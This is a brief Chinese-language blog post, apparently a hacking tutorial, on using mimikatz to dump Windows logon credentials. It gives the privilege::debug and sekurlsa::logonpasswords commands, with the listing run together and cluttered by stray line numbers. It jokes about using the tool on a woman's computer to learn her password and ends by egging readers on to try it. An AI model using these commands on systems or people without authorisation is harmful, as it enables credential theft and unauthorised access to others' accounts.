0x00 工具简介
mimikatz,很多人称之为密码抓取神器,确实是。在使用非administrator远程到目标机器后,我们可以使用神器来读取管理员的明文密码,借用女神一分钟电脑就知道她密码了~
内网渗透中,此神器还有其他作用,暂时没有研究,MARK此博客可深入探索
0x01 命令
找到32或者64位的EXE管理员身份打开
输入两条命令
1234privilege::debug回显 privilege '20'oksekurlsa::logonpasswords回显密码等hash信息
2323
0x02 测试
在我电脑win7测试
嗯,骑兵
是不是蠢蠢欲动呢~~~
题外话:如果你对本站文章字体有任何不适,请告知我,我会回复你,字体问题请配置浏览器,调到对眼睛舒适的大小;默认不允许转载,除非转载注明出处。
end